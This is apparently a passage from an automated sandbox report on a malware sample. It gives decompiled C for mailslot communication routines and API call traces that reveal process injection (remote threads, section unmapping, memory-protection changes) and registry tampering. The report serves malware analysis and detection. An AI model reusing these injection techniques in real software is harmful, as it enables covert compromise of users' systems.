						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}
APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 50136b8a9ad019f77738c7d2695a80d9cfa58a10d54e3dd229c6b48dc4baf302
  • Instruction ID: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
  • Opcode Fuzzy Hash: 2ED0A7C10F5D4412085E48CC143A5A300CAEC2171527BAE2F3439681A14B52311D0EC9
  • Instruction Fuzzy Hash: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 01B314D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,01B38000,?,?,01B3180F,00000000,?,01B37494), ref: 01B314FF
  • FindWindowA.USER32(01B38640,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31520
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}
APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
